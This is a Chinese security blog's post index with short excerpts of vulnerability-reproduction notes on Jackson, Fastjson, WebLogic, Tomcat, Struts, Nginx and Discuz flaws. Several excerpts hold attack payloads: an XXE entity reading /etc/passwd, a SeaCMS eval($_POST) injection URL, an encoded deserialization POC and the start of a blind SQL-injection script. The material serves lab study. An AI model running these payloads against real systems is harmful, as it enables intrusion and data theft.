自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

haha1314的博客

学习,总结。学习,总结。学习,总结。

  • 博客(100)
  • 收藏
  • 关注

原创 jackson-cve-2019-12384

jackson-cve-2019-12384当Jackson库对 JSON 进行反序列化的时候,存在反序列化漏洞,控制好反序列化的类,就能触发服务端请求伪造(SSRF)和远程代码执行漏洞(RCE)。漏洞原理和分析参考:运行漏洞环境:git clone https://github.com/cnsimo/vu1hub.gitcd vu1hub/jackson/CVE-2019-12384-RCE/docker-compose up -d服务器IP:192.168.88.13攻击机kali:1

2020-08-07 17:00:23 569

原创 jackson-cve-2017-7525

jackson-cve-2017-7525加上接受的内容格式会报错在tmp目录下面创建一个prove1.txt文件,创建文件的命令是加密的,怎么加密的我也不知道。POC{ "param": [ "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", { "transletBytecodes": [ "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQE

2020-08-07 16:50:02 532

原创 Fastjson

一、检测 1.2.67以下的fastjson{"@type":“java.net.Inet4Address”,“val”:“dnslog”}{"@type":“java.net.Inet6Address”,“val”:“dnslog”}但是有的不成功。二、利用Docker搭建环境2.1生成poc下面文件为反弹shell,替换成这一句,dnslog检测。String[] commands = {“ping”, “eqkkk1.dnslog.cn”};创建一个文件,TouchFile.jav

2020-08-07 16:44:02 875

原创 CSRF Token Thacker 插件

1、利用awvs,csrf高级别做实验。因为有token,每次重放之后都会跳转,不会执行成功。2、安装CSRF Token Thacker 插件3、配置name:返回包的token的name。重放成功。...

2020-04-23 16:45:03 569

原创 CNVD-2020-10487-Tomcat-Ajp-lfi

#!/usr/bin/env python#CNVD-2020-10487 Tomcat-Ajp lfi#by ydhcuiimport struct# Some references:# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.htmldef pack_string(s): if s is None: ret...

2020-04-22 17:26:00 1274

原创 Apache-shiro反序列化

使用docker搭建环境获取docker镜像docker pull medicean/vulapps:s_shiro_1重启dockersystemctl restart docker启动docker镜像:docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1访问:http://localhost:8081/ 环境搭建成功...

2020-04-22 16:57:42 1750

原创 XSS姿势——文件上传XSS

XSS姿势——文件上传XSS文件上传xss,一般都是上传html文件导致存储或者反射xss,一般文件内容都是html。1、把以下代码写入文件,后缀改成图片格式。<html> <body> <img src=1 onerror=alert(1)> </body></html>2、或者将后缀名改为htm...

2020-04-22 16:14:06 3074 1

原创 应急响应基础笔记(二)——应急响应之Linux入侵排查

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

2019-11-14 14:40:52 610

转载 应急响应基础笔记(一)——应急响应之Windows入侵排查

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

2019-11-14 14:32:57 597

原创 php代码漏洞

一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、in...

2019-10-22 16:07:23 636

原创 winrar远程代码执行漏洞(CVE-2018-2025)

2019 年 2 月 20 日 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。WinRAR 代码执行相关的 CVE 编号如下: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252,CVE-2018-202...

2019-08-25 22:39:34 759 1

原创 Discuz 7.x/6.x 代码执行

Discuz 7.x/6.x 全局变量防御绕过导致代码执行由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。漏洞复现安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...

2019-08-10 19:11:51 466

原创 weblogic后台上传webshell

后台上传webshell获取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表:点击安装,选择“上载文件”:上传war包。值得注意的是,我们平时tomcat用的war包不一定能够成功,你可以将你的webshell放到本项目的web/hello.war这个压缩包中,再上传。上传成功后点下一步。填写应用名称:继续一直下一步,最后点完成。应用目录在war包中WEB-INF/weblo...

2019-08-10 19:02:54 2885

原创 Weblogic的SSRF漏洞

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。漏洞产生于/uddiexplorer/SearchPublicRegistries.jsp页面中,可以导致ssrf,用来攻击内网中一些redis和fastcgi之类的脆弱组件/uddiexplorer/SearchPublicRegistries.jsp?rdoSea...

2019-08-10 18:54:43 953

原创 Weblogic 任意文件上传漏洞(CVE-2018-2894)

Weblogic 任意文件上传漏洞(CVE-2018-2894)Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。访问http://your-ip:7001/ws_utc/con...

2019-08-10 18:44:21 363

原创 symfonos靶机

一、 信息收集存活主机开放端口Enum4linux猜测aeolus可能为用户名尝试爆破:sergioteamo登陆4转到msf里面在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内,然后访问自己的9000端...

2019-08-10 18:40:08 745

原创 XXE靶机

一、 收集信息存活主机开放端口存在注入Post包里面添加<?xml version=“1.0″ encoding=“UTF-8″?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <root><n...

2019-08-10 18:31:45 679

原创 Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)Tomcat版本:8.5.19Apache Tomcat 7.0.0 - 7.0.79漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:<servlet> <servlet-name>default</servlet-name> ...

2019-07-25 08:36:14 1771

原创 脏牛提权(cve-2016-5159)

漏洞范围:大于2.6.22版本 (2007年发行,到2016年10月18日修复)危害:低权限的用户可利用这一漏洞在本地进行提权原理:linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...

2019-07-22 23:33:31 22942 1

原创 python版本切换

本篇博文面向Linux用户,在Linux下(Ubuntu)下测试通过,Win用户嘛,……0x00 为什么需要有两个版本的PythonPython2和Python3不兼容是每个接触过Python的开发者都知道的事,虽说Python3是未来,但是仍然有很多项目采用Python2开发。Linux的许多发行版本(如Ubuntu)都会自带Python2.7,但是当我们准备开发一个Python3项目的时候...

2019-07-21 20:25:40 844

转载 设置代理池

(1)安装kali linux虚拟机,请使用桥接模式,如果使用nat模式,proxifier需要新建规则不代理VMware Workstation的流量。安装proxychains-ng,安装后的命令是proxychains4。apt-get purge proxychains #卸载原proxychainsgit clone https://github.com/rofl0r/proxych...

2019-07-21 20:15:03 3564 1

原创 XSS练习

0x00 function render (input) { return '<div>' + input + '</div>' }没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script>0x01function render (input) { return...

2019-07-21 16:35:00 855

原创 CVE-2018-9995摄像头

一、漏洞介绍DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。二、复现过程1、搜索引擎搜索使用DVR设备的网站或服务器Shodan/zoomeye: “GNU rsp/1.0” 或 ...

2019-07-15 12:28:43 1377

原创 Weblogic--CVE-2017-10271

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。环境搭建启动测试环境:docker-compose up -d等待一...

2019-07-15 12:16:38 394

原创 struts S2-005 远程代码执行漏洞

S2-005 远程代码执行漏洞影响版本: 2.0.0 - 2.1.8.1漏洞详情: http://struts.apache.org/docs/s2-005.html原理参考吴翰清的《白帽子讲Web安全》一书。s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...

2019-07-15 12:14:41 2210

原创 Seacms

Payload1:http://192.168.88.147/sea/upload/search.php?searchtype=5&tid=&area=eval($_POST[123])Payload2:只有读取权没有写入权限http://192.168.88.147/sea/upload/search.php?searchtype=5&searchword={i...

2019-07-15 12:12:53 597

原创 openssl心脏滴血漏洞

Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。简单理解:OpenSSL:没有检测心跳包中的长度字段是否和后续的数据字段相符合...

2019-07-15 12:09:06 4943

原创 OpenSSH--CVE-2018-15473

OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。利用docker坏境环境启动后,我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p20022,输入密码vulhub,即可登录到容器中。漏洞复现使用CVE-201...

2019-07-15 12:06:38 2014

原创 Nginx 解析漏洞复现

Nginx 解析漏洞复现Nginx解析漏洞复现。版本信息:Nginx 1.x 最新版PHP 7.x最新版由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。增加/.php后缀,被解析成PHP文件:Docker搭建坏境上传图片解析成功,得到shell...

2019-07-15 12:04:50 524

原创 Nginx越界读取缓存漏洞(CVE-2017-7529)

Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞原理参考阅读:https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件...

2019-07-15 12:03:45 1271

原创 Nginx文件名逻辑漏洞(CVE-2013-4547)

Nginx文件名逻辑漏洞(CVE-2013-4547)漏洞说明影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7我们只需要上传一个空格结尾的文件,即可使PHP解析之。我们可以请求如下URI:/test[0x20]/../admin/index.php,这个URI不会匹配上location后面的/admin/,也就绕过了其中的IP验证;但最后请求的是/test...

2019-07-15 12:02:09 1656

原创 Discuz!X ≤3.4 任意文件删除漏洞

Discuz!X ≤3.4 任意文件删除漏洞影响版本:Discuz!X ≤3.4漏洞复现访问http://your-ip/robots.txt可见robots.txt是存在的:[外链图片转存失败(img-Na16JIU5-1563163104782)(2.png)]注册用户后,在个人设置页面找到自己的formhash:[外链图片转存失败(img-Lh7j02hX-15631631047...

2019-07-15 12:00:32 3732

原创 Discuz 7.x/6.x 全局变量防御绕过导致代码执行

Discuz 7.x/6.x 全局变量防御绕过导致代码执行由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。漏洞复现安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...

2019-07-15 11:57:45 965

原创 CVE-2019-0708:Windows RDP服务蠕虫级漏洞预警

CVE-2019-0708:Windows RDP服务蠕虫级漏洞预警0x00 漏洞说明2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017...

2019-07-15 11:55:51 531

原创 mysql布尔盲注exp直接爆数据

import requestsimport re#作者:wf#当前网站的数据库长度def database_len(): for i in range(30): database_len_url=f"{main_url}' and length(database())={i}--+" print(database_len_url) h...

2019-06-30 20:52:05 536

原创 python爬易看网所有小说

import reimport requestsimport threading#得到所有的小说urldef url(): url="https://www.ykanxiaoshuo.com/paihangbang/" data=requests.get(url) #print(data.status_code) 查看状态吗,上面去掉.text data....

2019-06-23 19:17:13 5817

原创 python生成字典

import itertools as itswords = input("请输入想要生成的数字、字母、特殊符号:").strip()word1 = input("请输入前面的固定字符,若没有直接enter:").strip()word2 = input("请输入后面的固定字符,若没有直接enter:").strip()len = int(input("请输入密码的长度,不包含前面和后面的...

2019-06-22 23:15:50 2798

转载 对现代化网站的渗透测试的思考

渗透测试的思考">对现代化网站的渗透测试的思考前言首先定义本文所说的现代化网站. 现代化网站是指符合以下多个特征的对外服务.储存,数据库,网站程序等服务器高度分离实现现代化前端技术, 如三大框架, html5新api, websocket基于虚拟化技术的服务部署使用现代后端框架,如ssm,think5,gin,django外部服务高度集成多种客户端,包括Android,Ios...

2019-06-20 10:53:33 555

原创 MySQL添加、删除与授权

MySQL添加用户、删除用户与授权MySql中添加用户,新建数据库,用户授权,删除用户,修改密码(注意每行后边都跟个;表示一个命令语句结束):1.新建用户1.1 登录MYSQL:@>mysql -u root -p@>密码1.2 创建用户:mysql> insert into mysql.user(Host,User,Password) values(“localh...

2019-06-06 09:49:17 134

原创 tomcat坏境部署

所需的源码包:提取码:一、安装、配置Java JDK环境1、 卸载Linux系统自带的java gcj及相关依赖包(使用yum方式)命令:rpm -qa | grep gcjyum erase java-1.5.0-gcjrpm -qa | grep gcj2、安装jdk软件包命令:cd /root/softtar xvfz /root/soft/jdk-7u65-linux...

2019-06-05 21:38:44 204

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除